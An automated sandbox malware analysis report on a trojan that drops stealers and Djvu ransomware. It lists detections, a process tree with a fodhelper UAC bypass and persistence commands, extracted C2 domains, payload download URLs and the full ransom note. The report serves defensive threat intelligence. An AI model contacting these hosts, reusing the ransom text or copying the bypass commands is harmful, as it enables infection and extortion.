Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6uVlPQSJ4e.exe

Overview

General Information

Sample name:6uVlPQSJ4e.exe
renamed because original name is a hash value
Original sample name:b05a74505fa03339578dff002ba57c69.exe
Analysis ID:1417167
MD5:b05a74505fa03339578dff002ba57c69
SHA1:b9851e84dbd2c8b2ecccb30452ddccb0496ef974
SHA256:e9839a31cca5038608b57f6e13e75f43aa845a2f892c917a77b3c4f0bcc35c7e
Tags:32exetrojan
Infos:

Detection

LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Glupteba
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Bypass UAC via Fodhelper.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Writes a notice file (html or txt) to demand a ransom
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6uVlPQSJ4e.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\6uVlPQSJ4e.exe" MD5: B05A74505FA03339578DFF002BA57C69)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • cmd.exe (PID: 3508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4068 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • DB15.exe (PID: 6336 cmdline: C:\Users\user\AppData\Local\Temp\DB15.exe MD5: 34BE2CA8394CF2DBD6AA006472864E97)
        • DB15.exe (PID: 7004 cmdline: C:\Users\user\AppData\Local\Temp\DB15.exe MD5: 34BE2CA8394CF2DBD6AA006472864E97)
          • icacls.exe (PID: 1432 cmdline: icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
          • DB15.exe (PID: 5356 cmdline: "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask MD5: 34BE2CA8394CF2DBD6AA006472864E97)
            • DB15.exe (PID: 4436 cmdline: "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask MD5: 34BE2CA8394CF2DBD6AA006472864E97)
              • build3.exe (PID: 2456 cmdline: "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)
      • DB15.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart MD5: 34BE2CA8394CF2DBD6AA006472864E97)
        • DB15.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart MD5: 34BE2CA8394CF2DBD6AA006472864E97)
      • A0B.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\A0B.exe MD5: 9E52AA572F0AFC888C098DB4C0F687FF)
      • cmd.exe (PID: 3708 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4932 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • DB15.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart MD5: 34BE2CA8394CF2DBD6AA006472864E97)
        • DB15.exe (PID: 3544 cmdline: "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart MD5: 34BE2CA8394CF2DBD6AA006472864E97)
      • 71C9.exe (PID: 6944 cmdline: C:\Users\user\AppData\Local\Temp\71C9.exe MD5: 9857733C11948AC79AA5362444C01E94)
        • cmd.exe (PID: 5680 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • fodhelper.exe (PID: 6516 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
          • fodhelper.exe (PID: 3040 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
          • fodhelper.exe (PID: 6744 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
            • 71C9.exe (PID: 3208 cmdline: "C:\Users\user\AppData\Local\Temp\71C9.exe" MD5: 9857733C11948AC79AA5362444C01E94)
              • powershell.exe (PID: 4948 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 416 cmdline: C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • gtdirat (PID: 5056 cmdline: C:\Users\user\AppData\Roaming\gtdirat MD5: B05A74505FA03339578DFF002BA57C69)
  • DB15.exe (PID: 5368 cmdline: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task MD5: 34BE2CA8394CF2DBD6AA006472864E97)
    • DB15.exe (PID: 6320 cmdline: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task MD5: 34BE2CA8394CF2DBD6AA006472864E97)
  • explorer.exe (PID: 3504 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • build2.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe" MD5: 8DAE8B6A6BE6E3527183594D1C26A2D3)
  • build2.exe (PID: 728 cmdline: "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe" MD5: 8DAE8B6A6BE6E3527183594D1C26A2D3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "5739ef2bbcd39fcd59c5746bfe4238c5", "Version": "8.6"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0857PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtsrZj8ANIaAyJo6Cgf02\\\\nflR2qhn8muc3Oiz92+\\/FrUFCEp\\/U18FNk8Vv5fGIXEg3YG12NymHl0xSSejdzJfI\\\\n1ffL3otjyS9WYjzkBBWMmiFTkF9E2htboQdRomdEZkqQqydJcyC3cxjQFsFqK93\\/\\\\nJYdAjHOYyPlP6NYhgiZSwQ+t+JujZyoFgHnjqltbJEZVx+pry1chXDuTB82Mvssa\\\\nP5LgyW4Zry3asIgxNkWzZPF5a5ncxMPc81E4iFpec5dDDIgijcJCWBvYFcrfGuMo\\\\nDqZSlbJ4xNRx36xZhLb5xLJbLyDpGMNTNKrPifl+A\\/CMVSrjgBKf2uCPwwSImO55\\\\nTwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
          • 0xffe88:$x1: C:\SystemID\PersonalID.txt
          • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
          • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
          • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
          • 0x1002ec:$s1: " --AutoStart
          • 0x100300:$s1: " --AutoStart
          • 0x103f48:$s2: --ForNetRes
          • 0x103f10:$s3: --Admin
          • 0x104390:$s4: %username%
          • 0x1044b4:$s5: ?pid=
          • 0x1044c0:$s6: &first=true
          • 0x1044d8:$s6: &first=false
          • 0x1003f4:$s7: delself.bat
          • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
          • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Click to see the 89 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          43.2.build3.exe.24115a0.1.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          43.2.build3.exe.24115a0.1.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
          • 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
          11.2.DB15.exe.28715a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            11.2.DB15.exe.28715a0.1.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
            • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
            • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
            11.2.DB15.exe.28715a0.1.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
            • 0xfe888:$x1: C:\SystemID\PersonalID.txt
            • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
            • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
            • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
            • 0xfecec:$s1: " --AutoStart
            • 0xfed00:$s1: " --AutoStart
            • 0x102948:$s2: --ForNetRes
            • 0x102910:$s3: --Admin
            • 0x102d90:$s4: %username%
            • 0x102eb4:$s5: ?pid=
            • 0x102ec0:$s6: &first=true
            • 0x102ed8:$s6: &first=false
            • 0xfedf4:$s7: delself.bat
            • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
            • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
            Click to see the 70 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Bypass UAC via Fodhelper.exe
            Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Users\user\AppData\Local\Temp\71C9.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\71C9.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\71C9.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\71C9.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\71C9.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 6744, ParentProcessName: fodhelper.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\71C9.exe" , ProcessId: 3208, ProcessName: 71C9.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\DB15.exe, ProcessId: 7004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\gtdirat, CommandLine: C:\Users\user\AppData\Roaming\gtdirat, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gtdirat, NewProcessName: C:\Users\user\AppData\Roaming\gtdirat, OriginalFileName: C:\Users\user\AppData\Roaming\gtdirat, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\gtdirat, ProcessId: 5056, ProcessName: gtdirat
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -nologo -noprofile, CommandLine: powershell -nologo -noprofile, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\71C9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\71C9.exe, ParentProcessId: 3208, ParentProcessName: 71C9.exe, ProcessCommandLine: powershell -nologo -noprofile, ProcessId: 4948, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:03/28/24-17:51:24.785698
            SID:2039103
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:07.691083
            SID:2020826
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:22.652702
            SID:2050742
            Source Port:49722
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:25.973948
            SID:2039103
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:12.395102
            SID:2036335
            Source Port:80
            Destination Port:49716
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:36.220237
            SID:2020826
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:36.220237
            SID:2036333
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:07.691083
            SID:2036333
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:30.590162
            SID:2039103
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:12.067143
            SID:2039103
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:12.423136
            SID:2036335
            Source Port:80
            Destination Port:49717
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:26.054274
            SID:2050742
            Source Port:49729
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:23.807369
            SID:2050742
            Source Port:49724
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:24.963150
            SID:2050742
            Source Port:49726
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:27.964579
            SID:2050742
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:50:16.070020
            SID:2039103
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:22.958626
            SID:2039103
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:11.871249
            SID:2833438
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:21.787623
            SID:2050741
            Source Port:57745
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:30.049750
            SID:2050742
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:03/28/24-17:51:21.904291
            SID:2050742
            Source Port:49721
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 6uVlPQSJ4e.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://sdfjhuz.com/dl/build2.exeruneerAvira URL Cloud: Label: malware
            Source: https://jennyilis.com/e0cbefcb1af40c7d4aff4aca26621a98.exeAvira URL Cloud: Label: malware
            Source: http://sajdfue.com/test1/get.phpAvira URL Cloud: Label: malware
            Source: http://trade-inmyus.com/index.phpAvira URL Cloud: Label: malware
            Source: http://sdfjhuz.com/dl/build2.exe$runAvira URL Cloud: Label: malware
            Source: http://sajdfue.com/test1/get.phpbAvira URL Cloud: Label: malware
            Source: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4Avira URL Cloud: Label: malware
            Source: http://sajdfue.com/files/1/build3.exeAvira URL Cloud: Label: malware
